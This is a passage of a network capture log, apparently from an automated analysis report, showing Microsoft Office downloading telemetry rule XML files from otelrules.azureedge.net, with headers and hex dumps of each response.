                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                104192.168.2.64984113.107.246.45443
                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                2024-10-06 14:42:06 UTC192OUTGET /rules/rule120676v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                2024-10-06 14:42:06 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                Date: Sun, 06 Oct 2024 14:42:06 GMT
                                                                                                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                                                                                                Content-Length: 472
                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
                                                                                                                                                                                                                                                                                ETag: "0x8DC582B984BF177"
                                                                                                                                                                                                                                                                                x-ms-request-id: 2f576d96-401e-0047-3902-178597000000
                                                                                                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                x-azure-ref: 20241006T144206Z-1657d5bbd482lxwq1dp2t1zwkc00000001xg000000005d8y
                                                                                                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                2024-10-06 14:42:06 UTC472INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120676" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120675" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                105192.168.2.64984313.107.246.45443
                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                2024-10-06 14:42:06 UTC192OUTGET /rules/rule120677v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                2024-10-06 14:42:06 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                Date: Sun, 06 Oct 2024 14:42:06 GMT
                                                                                                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                                                                                                Content-Length: 405
                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:25:37 GMT
                                                                                                                                                                                                                                                                                ETag: "0x8DC582B942B6AFF"
                                                                                                                                                                                                                                                                                x-ms-request-id: dfb96d6a-f01e-003f-17e5-16d19d000000
                                                                                                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                x-azure-ref: 20241006T144206Z-1657d5bbd48wd55zet5pcra0cg000000020000000000hzsg
                                                                                                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                2024-10-06 14:42:06 UTC405INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5e 5b 58 78 5d 5b 45 65 5d 5b 4e 6e 5d 24 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c
                                                                                                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120677" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120675" /> <SR T="2" R="(^[Xx][Ee][Nn]$)"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <


                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                106192.168.2.64984413.107.246.45443
                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                2024-10-06 14:42:06 UTC192OUTGET /rules/rule120679v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                2024-10-06 14:42:06 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                Date: Sun, 06 Oct 2024 14:42:06 GMT
                                                                                                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                                                                                                Content-Length: 174
                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:25:33 GMT
                                                                                                                                                                                                                                                                                ETag: "0x8DC582B91D80E15"
                                                                                                                                                                                                                                                                                x-ms-request-id: 0607cd43-401e-0078-1b00-174d34000000
                                                                                                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                x-azure-ref: 20241006T144206Z-1657d5bbd48qjg85buwfdynm5w0000000280000000006zft
                                                                                                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                2024-10-06 14:42:06 UTC174INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 37 22 20 2f 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 54 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 31 22 20 2f 3e 0d 0a 20 20 3c 2f 54 3e 0d 0a 3c 2f 52 3e
                                                                                                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120679" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120677" /> </S> <T> <S T="1" /> </T></R>


                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                107192.168.2.64984513.107.246.45443
                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                2024-10-06 14:42:06 UTC192OUTGET /rules/rule120678v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                2024-10-06 14:42:06 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                Date: Sun, 06 Oct 2024 14:42:06 GMT
                                                                                                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                                                                                                Content-Length: 468
                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:26:41 GMT
                                                                                                                                                                                                                                                                                ETag: "0x8DC582BBA642BF4"
                                                                                                                                                                                                                                                                                x-ms-request-id: f5ee0945-901e-0083-4202-17bb55000000
                                                                                                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                x-azure-ref: 20241006T144206Z-1657d5bbd48wd55zet5pcra0cg000000020000000000hzsk
                                                                                                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                2024-10-06 14:42:06 UTC468INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120678" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120677" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                108192.168.2.64984213.107.246.45443
                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                2024-10-06 14:42:06 UTC192OUTGET /rules/rule120675v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                2024-10-06 14:42:06 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                Date: Sun, 06 Oct 2024 14:42:06 GMT
                                                                                                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                                                                                                Content-Length: 419
                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:26:08 GMT
                                                                                                                                                                                                                                                                                ETag: "0x8DC582BA6CF78C8"
                                                                                                                                                                                                                                                                                x-ms-request-id: 3c7823fd-401e-0015-0c60-170e8d000000
                                                                                                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                x-azure-ref: 20241006T144206Z-1657d5bbd48vlsxxpe15ac3q7n000000023g000000008z8a
                                                                                                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                2024-10-06 14:42:06 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 55 75 5d 5b 50 70 5d 5b 43 63 5d 5b 4c 6c 5d 5b 4f 6f 5d 5b 55 75 5d 5b 44 64 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                                                                                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120675" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120673" /> <SR T="2" R="([Uu][Pp][Cc][Ll][Oo][Uu][Dd])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                109192.168.2.65851813.107.246.45443
                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                2024-10-06 14:42:07 UTC192OUTGET /rules/rule120681v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                2024-10-06 14:42:07 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                Date: Sun, 06 Oct 2024 14:42:07 GMT
                                                                                                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                                                                                                Content-Length: 958
                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:25:58 GMT
                                                                                                                                                                                                                                                                                ETag: "0x8DC582BA0A31B3B"
                                                                                                                                                                                                                                                                                x-ms-request-id: 0c165d1d-a01e-000d-7dfe-16d1ea000000
                                                                                                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                x-azure-ref: 20241006T144207Z-1657d5bbd48wd55zet5pcra0cg00000002400000000081bz
                                                                                                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                2024-10-06 14:42:07 UTC958INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 38 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 38 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 32 22 20 52 3d 22 31 32 30 36 38 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 33 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 41 4e 44 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a
                                                                                                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120681" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <R T="1" R="120608" /> <R T="2" R="120680" /> <TH T="3"> <O T="AND"> <L> <O T="EQ"> <L>


                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                110192.168.2.65852013.107.246.45443
                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                2024-10-06 14:42:07 UTC192OUTGET /rules/rule120682v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                2024-10-06 14:42:07 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                Date: Sun, 06 Oct 2024 14:42:07 GMT
                                                                                                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                                                                                                Content-Length: 501
                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:26:18 GMT
                                                                                                                                                                                                                                                                                ETag: "0x8DC582BACFDAACD"
                                                                                                                                                                                                                                                                                x-ms-request-id: c2f609cb-201e-0003-75fd-16f85a000000
                                                                                                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                x-azure-ref: 20241006T144207Z-1657d5bbd482lxwq1dp2t1zwkc00000001tg00000000hm0m
                                                                                                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                2024-10-06 14:42:07 UTC501INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 38 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 41 20 54 3d 22 31 22 20 45 3d 22 54 65 6c 65 6d 65 74 72 79 53 74 61 72 74 75 70 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 32 22 20 52 3d 22 31 32 30 31 30 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 53 20 54 3d 22 33 22 20 47 3d 22 7b 62 31 36 37 36 61 63 33 2d 37 66 65 65 2d 34 34 61 39 2d 39 61 30 65 2d 64 62 62 30 62 34 39 36 65 66 61 35 7d 22 20 2f 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22
                                                                                                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120682" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <A T="1" E="TelemetryStartup" /> <R T="2" R="120100" /> <SS T="3" G="{b1676ac3-7fee-44a9-9a0e-dbb0b496efa5}" /> </S> <C T="


                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                111192.168.2.65851713.107.246.45443
                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                2024-10-06 14:42:07 UTC192OUTGET /rules/rule120680v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                2024-10-06 14:42:07 UTC563INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                Date: Sun, 06 Oct 2024 14:42:07 GMT
                                                                                                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                                                                                                Content-Length: 1952
                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:25:39 GMT
                                                                                                                                                                                                                                                                                ETag: "0x8DC582B956B0F3D"
                                                                                                                                                                                                                                                                                x-ms-request-id: a5ff6bd9-301e-005d-3af2-16e448000000
                                                                                                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                x-azure-ref: 20241006T144207Z-1657d5bbd48vlsxxpe15ac3q7n000000025g000000002w1c
                                                                                                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                2024-10-06 14:42:07 UTC1952INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 38 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 53 53 20 54 3d 22 31 22 20 47 3d 22 7b 62 31 36 37 36 61 63 33 2d 37 66 65 65 2d 34 34 61 39 2d 39 61 30 65 2d 64 62 62 30 62 34 39 36 65 66 61 35 7d 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 32 22 20 52 3d 22 31 32 30 36 38 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 33 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 4c 54 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120680" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <SS T="1" G="{b1676ac3-7fee-44a9-9a0e-dbb0b496efa5}" /> <R T="2" R="120682" /> <F T="3"> <O T="LT"> <L>


                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                112192.168.2.65852113.107.246.45443
                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                2024-10-06 14:42:07 UTC192OUTGET /rules/rule120601v3s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                2024-10-06 14:42:07 UTC563INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                Date: Sun, 06 Oct 2024 14:42:07 GMT
                                                                                                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                                                                                                Content-Length: 3342
                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:25:34 GMT
                                                                                                                                                                                                                                                                                ETag: "0x8DC582B927E47E9"
                                                                                                                                                                                                                                                                                x-ms-request-id: 960edd56-701e-005c-4100-17bb94000000
                                                                                                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                x-azure-ref: 20241006T144207Z-1657d5bbd48gqrfwecymhhbfm8000000011g0000000011z5
                                                                                                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                2024-10-06 14:42:07 UTC3342INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 31 22 20 56 3d 22 33 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 4d 65 74 61 64 61 74 61 4f 53 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 44 43 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49
                                                                                                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120601" V="3" DC="SM" EN="Office.System.SystemHealthMetadataOS" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalBusinessImpact" DL="A" DCa="DC" xmlns=""> <RI


                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                113192.168.2.65851913.107.246.45443
                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
